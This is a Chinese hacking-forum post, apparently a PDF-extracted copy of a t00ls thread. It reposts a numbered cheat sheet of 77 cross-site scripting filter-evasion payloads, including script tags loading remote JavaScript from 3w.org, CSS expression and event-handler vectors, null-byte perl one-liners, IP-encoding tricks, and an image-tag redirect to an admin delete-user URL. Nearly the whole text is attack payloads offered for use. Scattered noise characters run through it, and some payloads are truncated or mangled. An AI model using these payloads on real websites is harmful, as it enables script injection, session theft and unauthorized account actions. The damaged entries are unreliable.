貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
5 y* L3 n$ ` U5 {(1)普通的XSS JavaScript注入
' x& F- [. ]1 [* {6 }<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 _* G5 F1 r1 r* ~6 X
(2)IMG标签XSS使用JavaScript命令
. x* {) X9 {5 S<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>- e f7 f0 C8 S O, Z0 R" L
(3)IMG标签无分号无引号
0 |# [! t4 E1 O0 y# u3 g<IMG SRC=javascript:alert(‘XSS’)>
/ }0 R4 Q& @% H8 f% y(4)IMG标签大小写不敏感2 G4 j( f! o" B/ A
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; i8 D! Y6 q n* Z$ n(5)HTML编码(必须有分号)) U; C( f. F9 ?. ^9 j) j
<IMG SRC=javascript:alert(“XSS”)>: V) u$ z+ }% [1 u
(6)修正缺陷IMG标签& |3 U4 V) C2 B$ E
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! b) A- |! s: p: e4 `$ w4 `% ~
: D! @' A% A8 O( l9 `6 L. n. I# V, j$ n
(7)formCharCode标签(计算器)) `- o. y/ t5 x; V* g) ~
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
7 E5 a* @9 ^5 h+ D9 t0 a(8)UTF-8的Unicode编码(计算器)) u* p; Y1 t9 n
<IMG SRC=jav..省略..S')>
$ |' Y/ z z5 l1 g9 k(9)7位的UTF-8的Unicode编码是没有分号的(计算器)$ e7 I( g: d4 {* w
<IMG SRC=jav..省略..S')>+ D! m. }3 h6 {
(10)十六进制编码也是没有分号(计算器)
' S' I1 |; d" R8 u- D<IMG SRC=java..省略..XSS')>/ r4 l+ a: R0 w, {$ e. w7 U! Q/ ~
(11)嵌入式标签,将Javascript分开
J- H) V- S2 K+ ^<IMG SRC=”jav ascript:alert(‘XSS’);”>; O* H& ~8 ~/ x7 D: l: j* ~5 W
(12)嵌入式编码标签,将Javascript分开* A4 f# Y1 T. G: H6 a: t
<IMG SRC=”jav ascript:alert(‘XSS’);”>
+ q* D" O, D) w) {1 R6 w- b(13)嵌入式换行符, `# ~# [' L/ c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ T8 E8 R& |) h0 V! U' g(14)嵌入式回车
+ m+ d) h9 k6 m& M, q% D<IMG SRC=”jav ascript:alert(‘XSS’);”>
; L) [# N+ L, |4 F! i(15)嵌入式多行注入JavaScript,这是XSS极端的例子
+ E9 _) X/ u3 T# o( I6 a9 U" p, c$ v<IMG SRC=”javascript:alert(‘XSS‘)”>1 T0 J& \. Y4 a# `1 D2 e( ~
(16)解决限制字符(要求同页面)
0 h. C) M# @( R( d7 [# o; s2 S<script>z=’document.’</script>
, y+ @# Z a h; o5 _. x3 c<script>z=z+’write(“‘</script>* ~+ B# Q+ D2 c, ?% D& b; j; o
<script>z=z+’<script’</script>. O3 ?' C/ r0 H
<script>z=z+’ src=ht’</script>6 M% ?/ C. ]) @
<script>z=z+’tp://ww’</script>
# S; k2 r7 u0 u( U% U* @' D<script>z=z+’w.shell’</script>
3 \8 {* A/ }! X$ U* X$ R<script>z=z+’.net/1.’</script>; t- u9 o0 r- ~
<script>z=z+’js></sc’</script>( x1 H+ b/ |0 d+ M
<script>z=z+’ript>”)’</script>. X0 x- \8 w& `+ h
<script>eval_r(z)</script>
; S* }4 Q7 \' r- g(17)空字符12-7-1 T00LS - Powered by Discuz! Board
" J: ?+ Q0 I% ihttps://www.t00ls.net/viewthread ... table&tid=15267 2/6: V; \. z/ q9 a+ k
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 c! i. |% O8 M+ ?+ l% k* j+ B
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用, V/ F' n/ m, M( C8 U
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ ?" L. w$ e; f5 Y3 |/ H(19)Spaces和meta前的IMG标签
5 W) ~9 }5 U% i+ S# Y I. L<IMG SRC=” javascript:alert(‘XSS’);”> K0 Z5 F3 h; P8 `* x3 @0 `/ o. `
(20)Non-alpha-non-digit XSS
6 R. U+ y7 N# s3 B$ }% p<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
. X: i4 ^ Q! [: W(21)Non-alpha-non-digit XSS to 2
/ {7 B" O. |, i9 B) K9 }! a1 R<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# N: ]: d3 H* S \* q" a(22)Non-alpha-non-digit XSS to 3
% S8 E$ H$ j" x) l3 g<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; D' z V- d8 A5 y- ~(23)双开括号5 w2 V. d" Z5 M
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
/ A# {* ?6 O& r4 E9 k7 X(24)无结束脚本标记(仅火狐等浏览器)
' c. ~% D% G2 a9 n+ |1 Y- U<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) A9 M( u6 A# \# I2 R' V(25)无结束脚本标记2
* h3 e3 F# J2 n# O9 E7 J<SCRIPT SRC=//3w.org/XSS/xss.js>0 o/ r3 o7 p( l9 i0 q# `0 X
(26)半开的HTML/JavaScript XSS
/ `5 f6 y/ U u$ d$ Z \<IMG SRC=”javascript:alert(‘XSS’)”
$ w2 ~ ]$ F: M! q+ ~8 D(27)双开角括号
! E- d! f3 h9 P9 K% }* J<iframe src=http://3w.org/XSS.html <
$ g5 T- h O( J0 \0 s(28)无单引号 双引号 分号% u- P9 ^, ?" o ?4 V
<SCRIPT>a=/XSS/
, R8 c+ \, |! }1 m5 R- q$ y! N0 Kalert(a.source)</SCRIPT>2 ?& H; W* m& M$ I' u
(29)换码过滤的JavaScript: _* v# E0 t1 z' D( T3 l
\”;alert(‘XSS’);//
& W( {4 @- ?0 k( s2 U! {(30)结束Title标签$ F3 v+ c9 X, [; ^2 a }
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
, v1 E9 O& n8 Q5 b# D(31)Input Image! D N! b7 O! h1 {6 c
<INPUT SRC=”javascript:alert(‘XSS’);”>
$ M- Z" R# l0 I& I/ m1 @$ N9 E1 |" E(32)BODY Image
" P/ r3 {: F. Y s7 W* W" Q: M; A Y<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 p+ S! Z! U. K4 s Z(33)BODY标签1 V* u. ~8 r3 r1 f; O
<BODY(‘XSS’)>
8 V2 C. c w3 n! {! N* o(34)IMG Dynsrc4 T5 k* ?9 S/ M8 |; a
<IMG DYNSRC=”javascript:alert(‘XSS’)”>4 o C l @9 ~5 P4 m
(35)IMG Lowsrc- v, G4 Y2 |8 o# `! |4 d
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
* P$ t7 h* u9 H(36)BGSOUND; c1 f; X/ f% ^* I: g, J& ^* r; a
<BGSOUND SRC=”javascript:alert(‘XSS’);”>) T$ M( Z0 K) o! K/ W2 Q
(37)STYLE sheet% F- _0 D8 d( M# F2 T9 l
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>6 A% \4 _& o0 R7 a; [8 }& E
(38)远程样式表3 G/ k0 x: n9 m2 R
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% a& k& }0 G: ~) g* B* ^' p9 \(39)List-style-image(列表式)$ U; C5 ~- F# |) E
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS3 A& d% z* U& t8 H+ M
(40)IMG VBscript) o \8 V" i9 u/ {: ^; |! [
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
3 d" n" t& e* U( o9 O* T6 s* s(41)META链接url
$ d7 a2 X+ }7 p" A6 U$ ] k W4 W5 X/ i
. z4 x0 H) w& g* N5 H0 V<META HTTP-EQUIV=”refresh” CONTENT=”0;
3 ?, F2 ~' I' m4 H' lURL=http://;URL=javascript:alert(‘XSS’);”>7 b% O8 Y3 C. u6 `
(42)Iframe
0 W; g. p4 i/ A+ _" S1 r<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 u% W; @9 s* t; E2 U
(43)Frame
" j2 q$ V* {) o( ?2 M# k<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
2 r" Z3 H0 R8 e( q9 Ohttps://www.t00ls.net/viewthread ... table&tid=15267 3/67 j- J4 O# {; D \7 j
(44)Table+ A0 A, U! a% }- Z4 v' O/ P4 R( D& o
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
3 w$ `) x) m% t7 ]: w8 l. o: ?(45)TD
! P l' \- z: \- P* h3 H/ B% z! |<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
! N$ y7 I f" v, p(46)DIV background-image
! i( A+ b& P/ a<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- M: @/ L, q7 d" z(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
9 B5 e( E8 U1 L+ B* C5 m8&13&12288&65279). K3 X1 k9 x% z! l9 o; l
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, E! G" D8 W& Z! }* {! I/ g(48)DIV expression
! z; |# {5 g- o<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
+ C- V# [. r4 o* |6 i8 d(49)STYLE属性分拆表达
1 v/ ?& j8 f$ c6 C$ h2 [<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
, Z* W) T( h3 O' v, |) R(50)匿名STYLE(组成:开角号和一个字母开头)
4 P# m) c, T6 \0 {! I3 d" N1 r<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>7 O2 l1 n- @5 ?8 W/ V. f
(51)STYLE background-image) X, |+ {9 F" M& e
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A% x/ s+ i; W; z% y9 h
CLASS=XSS></A>
% [$ b8 M) i; Z+ h( ~+ C0 k(52)IMG STYLE方式; o! h7 t+ I4 K& [
exppression(alert(“XSS”))’>6 t k/ k& L$ |! N( f$ E* U! m! |
(53)STYLE background
: _$ P" J! r, X, [- y<STYLE><STYLE
- Y9 T- \, N0 g) Q2 L! f5 Itype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>2 H0 S. s" T5 o; H' W& ?) G2 }
(54)BASE
; \7 |9 X# G6 g$ C& D<BASE HREF=”javascript:alert(‘XSS’);//”>
. _; @4 p3 ^' F$ b0 s(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS' i+ j. h! n% w; W X$ f! }
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>5 S7 i$ [6 U1 d1 E; z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
7 _1 s: R8 F0 G7 Za=”get”;; T m) G3 D$ V; P; m; O9 n# q
b=”URL(\”";
- C$ W5 {$ O2 u1 \2 i, Zc=”javascript:”;% U9 ? }4 E: S" {8 M
d=”alert(‘XSS’);\”)”;+ \4 |! n2 a" e( f# \
eval_r(a+b+c+d);
) \5 n& f* g' w. d3 C+ @; ~% i(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
' c8 \5 r/ I! z<HTML xmlns:xss>
@3 ?6 b6 }" T ~5 m3 c4 U1 E7 r( S<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>- |) J5 m' J* x# K2 h" v/ Y
<xss:xss>XSS</xss:xss>; \& m' W* k$ \
</HTML>
- n, A K6 Z7 F8 z8 I" s(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 D* s9 B7 @7 t, l p" y<SCRIPT SRC=””></SCRIPT>: r% K- n# d# Z) z" _# Z
(59)IMG嵌入式命令,可执行任意命令
) s$ Z% T" O7 t4 s$ }0 C, J<IMG SRC=”http://www.XXX.com/a.php?a=b”>! Z5 ^3 L6 c5 a
(60)IMG嵌入式命令(a.jpg在同服务器): n2 ]9 K4 N8 c3 P7 B
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& }! D" `, p5 ?7 `1 Q+ c. v J1 Q(61)绕符号过滤% `7 m# k9 s, H" ~# s# G
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 h" I/ U5 G! U
(62)3 u' S' Z& R8 q- q
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 t' w: G* Z0 V& z
(63)
& b& M' \0 ~6 N1 P5 o b% a<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>+ A, R, n- N* C; n' d
(64)
: t; ~! _# Z5 P+ p0 @) G% S1 m, E<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
N/ }+ l! d& E(65)
% X! _2 H, s8 G<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( K+ e5 e/ O* B, c: d- S
(66)12-7-1 T00LS - Powered by Discuz! Board9 L$ O5 t) T; X
https://www.t00ls.net/viewthread ... table&tid=15267 4/6
$ S1 j8 n% @0 R4 y" g7 g, V& X<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! g4 @) [9 e" ~9 P8 j$ p; [0 M
(67)
' {* a" w& K5 g" }* X0 m8 z<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>. \3 L# ^/ W/ d8 f6 G! e
</SCRIPT>
0 W. \+ s( T/ l+ P(68)URL绕行; c' Y3 a8 W1 `* a
<A HREF=”http://127.0.0.1/”>XSS</A>
& I# P5 F. j v3 x) s5 c4 A(69)URL编码4 v) E: O' ~0 X% x a, k+ @
<A HREF=”http://3w.org”>XSS</A>
! I0 m7 R0 g2 ~4 }5 t(70)IP十进制0 f. D4 j* _3 M7 H
<A HREF=”http://3232235521″>XSS</A>
# |4 [/ l# x! K5 z! e- u; { ^(71)IP十六进制
+ z3 c5 j {2 g0 ~0 E; Q<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>' L3 Z0 Y0 z% z' A3 G1 p) o% S
(72)IP八进制
& \2 k; v8 t3 N Y/ S: R<A HREF=”http://0300.0250.0000.0001″>XSS</A>$ K. f+ P: H4 ]. V5 g) a+ s g
(73)混合编码
) e& ]( U" d9 K- F! F2 w<A HREF=”h
; p6 O9 j' r2 H* ]" Htt p://6 6.000146.0×7.147/”">XSS</A>7 v+ w- b( M6 H9 \% m$ }5 W3 z8 {0 ]' ^
(74)节省[http:]% s& B, \ Y+ B4 z4 k+ Z
<A HREF=”//www.google.com/”>XSS</A>
" r6 k* L; a' A& v8 P(75)节省[www]
6 E# V5 V' b$ M0 f. L<A HREF=”http://google.com/”>XSS</A>
5 y: ~- f! o; z: q5 T(76)绝对点绝对DNS- F U- `7 @) X6 _0 {
<A HREF=”http://www.google.com./”>XSS</A>0 z( r# X5 v- W
(77)javascript链接
( e% t* [0 H3 M4 E4 o# p<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>/ U1 E1 [9 U! I" x( i
& _) ]; r5 w6 W# c; ~* l1 ~( H" v原文地址:http://fuzzexp.org/u/0day/?p=14
* |. }1 B1 R; U3 Q7 Q4 Q: K6 D1 ^
! N5 { M4 y6 L; p" U1 Z |
发表于 2013-4-19 19:22:37
收藏
支持
反对